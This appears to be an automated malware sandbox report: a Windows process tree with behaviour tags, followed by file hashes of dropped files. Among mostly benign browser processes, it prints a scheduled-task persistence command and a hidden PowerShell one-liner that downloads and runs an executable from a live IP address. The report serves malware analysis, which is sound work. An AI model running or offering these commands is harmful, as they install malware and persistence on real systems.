                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1900 -parentBuildID 20240401114208 -prefsHandle 1812 -prefMapHandle 1804 -prefsLen 27211 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {68e021b4-e545-4ac6-bad1-9c64d02848f2} 912 "\\.\pipe\gecko-crash-server-pipe.912" gpu
                                                                                                                                                        6⤵
                                                                                                                                                          PID:2984
                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2360 -parentBuildID 20240401114208 -prefsHandle 2336 -prefMapHandle 2324 -prefsLen 28131 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c3bcc-ff30-4343-bc9d-30f975e6b7f0} 912 "\\.\pipe\gecko-crash-server-pipe.912" socket
                                                                                                                                                          6⤵
                                                                                                                                                            PID:1004
                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3412 -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0af34d6-4aba-4293-a34c-9238702c3b62} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
                                                                                                                                                            6⤵
                                                                                                                                                              PID:2292
                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3980 -childID 2 -isForBrowser -prefsHandle 3788 -prefMapHandle 1080 -prefsLen 32621 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20ca008b-beae-4e97-90c8-82241f0da7f0} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
                                                                                                                                                              6⤵
                                                                                                                                                                PID:4260
                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4540 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4800 -prefMapHandle 4648 -prefsLen 32621 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78f23c1f-147b-4129-9ed5-8c6a46f70d78} 912 "\\.\pipe\gecko-crash-server-pipe.912" utility
                                                                                                                                                                6⤵
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                PID:2368
                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5488 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83f1e9fa-1c17-4277-a318-aae0683aa254} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:6372
                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5628 -prefMapHandle 5632 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7eb44f95-1ae3-4059-872d-9e9b9869bc19} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:6384
                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5820 -childID 5 -isForBrowser -prefsHandle 5832 -prefMapHandle 5836 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55543cf6-977b-47c3-b761-355e527b5bcc} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:6396
                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -childID 6 -isForBrowser -prefsHandle 3504 -prefMapHandle 3520 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2faa602b-41a3-4a60-99e0-7660aa23dbb6} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:5244
                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6164 -childID 7 -isForBrowser -prefsHandle 6156 -prefMapHandle 6152 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb96bed0-141a-4179-9d3f-050adbba8374} 912 "\\.\pipe\gecko-crash-server-pipe.912" tab
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6360
                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6080 -parentBuildID 20240401114208 -prefsHandle 6088 -prefMapHandle 5708 -prefsLen 33150 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {034a014a-7c2c-4239-be15-54b39419bd87} 912 "\\.\pipe\gecko-crash-server-pipe.912" rdd
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6688
                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6072 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5788 -prefMapHandle 5784 -prefsLen 33150 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bba17b7f-303a-4154-9c87-871dbbb9b69b} 912 "\\.\pipe\gecko-crash-server-pipe.912" utility
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:6976
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1090382001\85e559204e.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1090382001\85e559204e.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:1404
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c schtasks /create /tn mcNxtmaBsXa /tr "mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:2132
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /create /tn mcNxtmaBsXa /tr "mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                          5⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                          PID:1908
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        mshta C:\Users\Admin\AppData\Local\Temp\dIi8d4euv.hta
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:4008
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Downloads MZ/PE file
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:1996
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:6200
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1090383001\1e56a29b0d.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1090383001\1e56a29b0d.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:6676
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1090384001\ebp51gY.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:4696
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1090385001\DTQCxXZ.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:6984
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1090386001\7nSTXG6.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:4956
                                                                                                                                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        PID:5096
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1090387001\fa829ac30d.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1090387001\fa829ac30d.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      PID:6680
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1090388001\26da168d66.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1090388001\26da168d66.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3808
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2832 -ip 2832
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2260
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3740
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff91609cc40,0x7ff91609cc4c,0x7ff91609cc58
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3628
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1884 /prefetch:2
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5524
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:3
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:5308
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2116 /prefetch:8
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4860
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2248
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3164,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3324 /prefetch:1
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5512
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4276 /prefetch:1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:6020
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3168,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:8
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5996
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4564 /prefetch:8
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:5980
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4404
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4592,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:8
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:3040
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4600
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,6327308483834465428,4093775197928552781,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5468
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4264
                                                                                                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:5652
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4624
                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 852 -ip 852
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4272
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1408 -ip 1408
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1096
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:3992
                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1572
                                                                                                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004E0
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:5260
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:1408
                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5540
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                              PID:3588
                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:5368
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3116 -ip 3116
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:1884
                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 568 -p 1560 -ip 1560
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5324
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:4148
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:4884
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:6048

                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                  • C:\ProgramData\sjmgv\s0zm7q

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    288KB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    20682771e9cffe23e7b911e8bf4af7d7

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    88b87bfee61600527240ad12985c536b11946381

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    9d909542dbf0edacd3d780ded5d72bed47d17a8abcaaf76b1a2423bd877ff3a5

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    2f03e51bc5c0161329a679403433bffaea2317de154633a7c670d79e81533b4b3b4dcbedd2d7ad5ae747b94b8598f9cbe273086e264da08741b788e94be0712e

                                                                                                                                                                                                                  • C:\Users\Admin:.repos

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    1920fb2c91e8a4bd85acd3e5255dc588

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    3296650178cff9863756a99a5544b3ffdf20d477

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    c18bc2cfa5854723588fcba836c425ecd11f2b59e3da5cfb9ae26e296ca987d1

                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                    9e6fbfb11c0711b2df017d4c533eba3ccf967e8d1eb426854211d47c3e5af9e08a46489df84baf480061ce586309bb3f5a7d4cbda4721bf24c988dd0287f9c19

                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                    40B

                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                    e1ea26d70deaa7c1f192a644dd30e435

                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                    f2b37f62d6985833a5c9ade9db3f0df4a09bec5b

                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                    0207abf09cb50b57b86eca159918d4657a96710a22ad36ebc2992434cbd60b07

                                                                                                                                                                                                                    SHA512

